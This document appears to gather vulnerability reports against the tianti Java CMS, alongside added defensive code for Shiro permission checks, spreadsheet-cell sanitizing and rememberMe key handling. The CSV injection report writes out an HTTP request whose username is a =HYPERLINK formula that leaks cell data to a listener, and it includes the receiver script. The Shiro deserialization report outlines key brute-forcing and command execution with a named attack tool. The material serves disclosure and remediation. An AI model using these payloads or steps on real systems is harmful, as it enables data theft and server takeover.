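As an added example that is not the project's own code, the following Spring MVC controller fragment shows the check that both the incorrect-access-control report and the administrator-addition report above are missing: each handler declares the permission it requires, and the user-save handler additionally checks the `roleId` value it was sent, since holding the right to create users does not imply the right to hand out every role. It assumes the Shiro 1.3 and Spring MVC 4.2 dependencies listed in the README and that Shiro's annotation support (AuthorizationAttributeSourceAdvisor plus a DefaultAdvisorAutoProxyCreator) is enabled in the Spring MVC context; the class name, the permission strings (`cms:column:list`, `user:skin:list`, `user:save`, `role:assign:<id>`) and the commented-out service call are hypothetical.

```java
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authz.AuthorizationException;
import org.apache.shiro.authz.annotation.RequiresPermissions;
import org.apache.shiro.subject.Subject;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

/**
 * Added example (not tianti code): authorization enforced per handler, plus an
 * instance-level check on attacker-controlled input. Permission strings are
 * hypothetical and must match what the application's Shiro realm grants.
 */
@Controller
public class AuthorizedAdminController {

    // Declarative check: a subject lacking cms:column:list gets an
    // AuthorizationException from the Shiro proxy before the body runs.
    @RequiresPermissions("cms:column:list")
    @RequestMapping("/cms/column/list")
    public String columnList() {
        return "cms/column_list";
    }

    @RequiresPermissions("user:skin:list")
    @RequestMapping("/user/skin/list")
    public String skinList() {
        return "user/skin_list";
    }

    // The roleId comes from the request, so the server decides whether the
    // caller may grant that particular role: the super administrator's realm
    // grants role:assign:*, a lesser role only role:assign:<ids it may grant>.
    @RequiresPermissions("user:save")
    @RequestMapping(value = "/user/ajax/save", method = RequestMethod.POST)
    @ResponseBody
    public String saveUser(@RequestParam("username") String username,
                           @RequestParam("password") String password,
                           @RequestParam("roleId") String roleId) {
        Subject subject = SecurityUtils.getSubject();
        if (!subject.isPermitted("role:assign:" + roleId)) {
            // Worth logging: an authenticated user asked for a role it cannot grant.
            throw new AuthorizationException(
                "subject " + subject.getPrincipal() + " may not assign role " + roleId);
        }
        // userService.save(username, password, roleId);  // hypothetical service call
        return "{\"success\":true}";
    }

    // Programmatic form of the same check, for code paths where annotation
    // proxies do not apply (for example a method invoked from within the same bean).
    public static void requirePermission(String permission) {
        SecurityUtils.getSubject().checkPermission(permission); // throws AuthorizationException
    }
}
```

A second, deny-by-default layer is the Shiro filter chain in the Spring configuration, for example `/cms/** = authc, perms["cms:*"]` and `/user/skin/** = authc, perms["user:skin:list"]`, so that a handler added later without an annotation is still not reachable by an authenticated low-privilege user; `authc` alone does not help here, because both reports are made with a logged-in session.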

Column code validation

Why can't the column code validation on the form page for adding a second-level column in the column list jump to the validation method in the controller?

CSV Injection Vulnerability

The product has a CSV injection vulnerability. The premise is that you need to be in the login state.

1. First create a low-privileged user
[screenshot]

2. Log in as the low-privileged user and create a malicious user
[screenshot]

Then send the packet:

```http
POST /tianti-module-admin/user/ajax/save HTTP/1.1
Host: localhost:8888
Content-Length: 135
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8888/tianti-module-admin/user/update_pwd
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D1E9B42664FA8DF416B5D97A8CEAA805; _jspxcms=0bdeaa17af6448558d5181a98d4df1a0; Hm_lvt_57e9a5bfc4003c9bc1fd23dba7598170=1664259891; Phpstorm-66f14989=68db331b-21f1-4319-88e3-036932e5e8ad; _jpanonym="MGUyNzc1N2NmY2QwZTA0MDk4YzBlN2ZjNTY2YzBjYTQjMTY2ODM0MDQ1NjU5MCMzMTUzNjAwMCNOekkyTXpOaE1tVXpZak5sTkRCallqaGtORFZtTm1abE5qUm1OV1V4WkRRPQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1668340479; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1669038142,1669101592,1669167302; Hm_lvt_1040d081eea13b44d84a4af639640d51=1669203862; __bid_n=184a44da31c5abff074207; PUBLICCMS_ANALYTICS_ID=129faf04-65fd-46b0-8d88-56f21d780fe5; PUBLICCMS_ADMIN=1_e45b8556-ed10-4917-a0f5-8e9fc43a2828; JSESSIONID=d2e34d48-bb9d-4174-a34e-dff5b868def8
Connection: close

id=&username==HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")&password=123456&realName=&mobile=&roleId=
```

Successfully added a user named =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E")
[screenshot]

3. Run the Python script to receive the request locally:
```python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json

data = {'result': 'hacked'}
host = ('localhost', 8007)


class RequestHandler(BaseHTTPRequestHandler):
    # Answers any GET with a small JSON body; a hit here shows the exported cell triggered a request
    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())


if __name__ == '__main__':
    server = HTTPServer(host, RequestHandler)
    print("Starting server, listen at: %s:%s" % host)
    server.serve_forever()
```
4. When the admin exports the .xlsx file, open the .xlsx log file and double-click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E"). Then click an empty cell. And then click the cell containing =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") again. In this case, a request is sent to localhost:8007.
    [screenshot]

First double-click the =HYPERLINK("http://localhost:8007?u="%26B2%26B3%2c"E") cell
[screenshot]
Click on a blank cell
[screenshot]
Finally, clicking the original cell again will send a request to localhost:8007 through the browser
[screenshot]

It is recommended to block formulas when exporting Excel to prevent the risk of CSV injection.
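As an added example (not tianti code and not the reporter's), the following Java helper implements the mitigation the report recommends: any exported cell value whose first non-space character would make a spreadsheet parse it as a formula is neutralized before it is written. The class, the `csvField` helper and the sample inputs are constructed for illustration; in the project's POI-based export the call would be `neutralize(value)` on every string cell before `setCellValue`.

```java
import java.util.Arrays;
import java.util.List;

/** Added example: defuse spreadsheet formula injection in exported cell values. */
public final class SpreadsheetCellSanitizer {

    private SpreadsheetCellSanitizer() {}

    // A cell whose first non-space character is one of these is parsed as a
    // formula by Excel/LibreOffice when the file is a CSV, or when a user
    // edits the cell in an .xlsx (the double-click step in the report above).
    private static final String FORMULA_TRIGGERS = "=+-@\t\r";

    /** True when a spreadsheet application would treat the value as a formula. */
    public static boolean looksLikeFormula(String value) {
        if (value == null) {
            return false;
        }
        int i = 0;
        while (i < value.length() && value.charAt(i) == ' ') {
            i++;                               // leading spaces are ignored by the parser
        }
        return i < value.length() && FORMULA_TRIGGERS.indexOf(value.charAt(i)) >= 0;
    }

    /**
     * Prefix a single quote so the content is treated as text. The quote
     * survives a user editing and re-committing the cell, which is exactly
     * the case the report demonstrates.
     */
    public static String neutralize(String value) {
        return looksLikeFormula(value) ? "'" + value : value;
    }

    /** For a CSV export: neutralize, then quote RFC 4180 style (embedded quotes doubled). */
    public static String csvField(String value) {
        String safe = neutralize(value == null ? "" : value);
        return "\"" + safe.replace("\"", "\"\"") + "\"";
    }

    public static void main(String[] args) {
        // Constructed samples: the username from the report, plus variants a
        // naive "starts with =" check would miss, and a harmless name.
        List<String> names = Arrays.asList(
            "=HYPERLINK(\"http://localhost:8007?u=\"&B2&B3,\"E\")",
            "  +1+1",
            "@SUM(A1:A3)",
            "-1",
            "\tA1",
            "alice");
        for (String n : names) {
            System.out.println(n + "  ->  " + csvField(n));
        }
    }
}
```

Apply this to string columns only: a genuinely numeric column holding -1 should be written as a numeric cell, not a text cell, and the apostrophe is visible in some viewers, which is the accepted trade-off. Note that the project-level fix for the report is this export-side encoding, not rejecting `=` in usernames, because the same stored value is also shown in HTML (where a different encoding applies) and because an admin export can include data from other fields and other modules.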

The project has a Shiro deserialization vulnerability

1. First, set up a local service and ensure that it can run properly.
Find its back-end login address.
[screenshot]
2. We can see that the rememberMe cipherKey has been written into the source code.
[screenshot]
3. Inspect the Shiro framework using the Shiro blasting tool.
[screenshot]
4. Once the cipherKey is specified, brute-force Shiro's gadget chain.
[screenshot]
5. Discovered the gadget chain: CommonsBeanutilsString_183; the command output mode is AllEcho.
6. The whoami command was successfully executed, confirming the existence of the vulnerability.
[screenshot]
7. Tool link: https://github.com/SummerSec/ShiroAttack2
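As an added example that is not the project's configuration, the following Java class shows how the rememberMe cipherKey flagged in step 2 can be handled so that it is neither a constant in source nor shared across installations: it is generated once with Shiro's own `AesCipherService`, stored outside the repository, and loaded at startup, with startup refused if it is absent. The class and the environment variable name are hypothetical; the Shiro 1.3 APIs used (`AesCipherService.generateNewKey`, `CookieRememberMeManager.setCipherKey`, `DefaultWebSecurityManager.setRememberMeManager`, `org.apache.shiro.codec.Base64`) are real.

```java
import java.security.Key;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;

/**
 * Added example (not tianti code): rememberMe key generated per deployment
 * and loaded from the environment instead of being hard-coded.
 */
public final class RememberMeKeyExample {

    // Hypothetical name; any secret store that the container can read works.
    private static final String ENV_VAR = "TIANTI_REMEMBERME_KEY";

    private RememberMeKeyExample() {}

    /** Generate a fresh 128-bit AES key, to be run once and stored as a secret. */
    public static String generateKeyBase64() {
        Key key = new AesCipherService().generateNewKey();
        return Base64.encode(key.getEncoded());
    }

    /** Load the key; refuse to start rather than fall back to a known constant. */
    public static byte[] loadKey() {
        String b64 = System.getenv(ENV_VAR);
        if (b64 == null || b64.isEmpty()) {
            throw new IllegalStateException(
                ENV_VAR + " is not set; refusing to start with a default rememberMe key");
        }
        byte[] key = Base64.decode(b64);
        if (key.length != 16 && key.length != 24 && key.length != 32) {
            throw new IllegalStateException("rememberMe key must be 128, 192 or 256 bits");
        }
        return key;
    }

    /** Equivalent of the securityManager bean in the Spring XML, built in code. */
    public static DefaultWebSecurityManager securityManager() {
        CookieRememberMeManager rememberMe = new CookieRememberMeManager();
        rememberMe.setCipherKey(loadKey());
        DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
        manager.setRememberMeManager(rememberMe);
        return manager;
    }

    public static void main(String[] args) {
        // One-time step at deployment; the printed value goes into the secret store, never into git.
        System.out.println("new rememberMe key (store as a secret): " + generateKeyBase64());
    }
}
```

In the project's Spring XML the equivalent is to inject the decoded key into the `cipherKey` property of the `CookieRememberMeManager` bean from an externalized property rather than a literal. On a single node, leaving `cipherKey` unset is also safe on Shiro 1.2.5 and later, which generate a random key at each startup (at the cost of invalidating rememberMe cookies on restart); a fixed key is only needed when several nodes must accept each other's cookies. Whoever holds the key can produce a rememberMe cookie whose serialized payload the server will deserialize, which is why the key is handled as a secret rather than as configuration, and why a key that has ever been committed should be rotated.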
